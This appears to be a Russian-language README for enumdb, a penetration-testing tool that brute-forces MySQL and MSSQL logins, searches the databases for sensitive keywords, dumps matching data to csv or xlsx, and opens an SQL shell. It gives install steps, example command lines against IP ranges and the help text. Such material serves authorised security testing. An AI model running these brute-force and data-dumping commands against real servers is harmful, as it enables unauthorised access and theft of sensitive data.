
Инструмент для брутфорса и пост-эксплуатации реляционных баз данных MySQL и MSSQL.
Enumdb — это инструмент для брутфорса реляционных баз данных и пост-эксплуатации для MySQL и MSSQL. При указании списка имен пользователей и/или паролей он перебирает каждый хост в поисках валидных учетных данных. По умолчанию enumdb использует вновь обнаруженные учетные данные для автоматического поиска конфиденциальных данных по ключевым словам в именах таблиц или столбцов. Эта информация может быть извлечена и сохранена в файл .csv или .xlsx.
Недавние дополнения:
-r csv или -r xlsx.-v).Количество извлеченных строк, базы данных и таблицы в черном списке, а также ключевые слова для поиска можно изменить в: enumdb/config.py.
Enumdb разработан и протестирован с использованием Python3 на Debian-подобных Linux-системах (kali). Однако инструмент также совместим с Python2.7 и другими дистрибутивами Linux.
git clone https://github.com/m8r0wn/enumdb
cd enumdb
python3 setup.py install
Подключиться к базе MySQL и выполнить поиск ключевых слов в именах таблиц (без отчета)
enumdb -u root -p 'password123' -t mysql 10.11.1.30
Подключиться к базе MSSQL с использованием доменных учетных данных, выполнить поиск данных по ключевым словам в именах столбцов и выгрузить в файл .xlsx:
enumdb -u 'domain\\user' -p Winter2018! -t mssql -columns -report xlsx 10.11.1.30
Брутфорс нескольких серверов MySQL в поисках стандартных учетных данных (без перебора данных или таблиц)
enumdb -u root -p '' -t mysql --brute 10.11.1.0-30
Брутфорс входа учетной записи MSSQL sa. После обнаружения валидных учетных данных выполнить перебор по именам таблиц с выводом в отчет .csv:
enumdb -u sa -P passwords.txt -t mssql -columns -report xlsx 192.168.10.10
Запустить SQL-оболочку на системе:
enumdb -u sa -P 'P@ssword1' -t mssql --shell 192.168.10.10
optional arguments:
-h, --help показать это справочное сообщение и выйти
-T MAX_THREADS Максимальное количество потоков (по умолчанию: 10)
-v Подробный вывод
Connection:
-port PORT Указать нестандартный порт
-t {mysql,mssql} Тип базы данных
target Целевой сервер(ы) базы данных [Позиционный]
Authentication:
-u USERS Одно имя пользователя
-U USERS Файл Users.txt
-p PASSWORDS Один пароль
-P PASSWORDS Файл Password.txt
Enumeration:
-c, --columns Поиск ключевых слов в именах столбцов (по умолчанию: имена таблиц)
-r {none,csv,xlsx} Извлечь данные и создать отчет
Additional Actions:
--brute Только брутфорс (без перебора БД)
--shell Запустить SQL-оболочку
enumdb#> help
...
edb_databases - список всех баз данных
edb_tables [DB] - список таблиц в БД
edb_columns [table].[DB] - список столбцов в таблице
edb_dump [table].[DB] [#rows] - получить данные из таблицы
[SQL Query] - выполнить необработанный SQL-запрос
Если возникают проблемы с MySQLdb, могут потребоваться дополнительные ресурсы для разработки MySQL:
sudo apt-get install python3-dev default-libmysqlclient-dev build-essential
sudo yum install python3-devel mysql-devel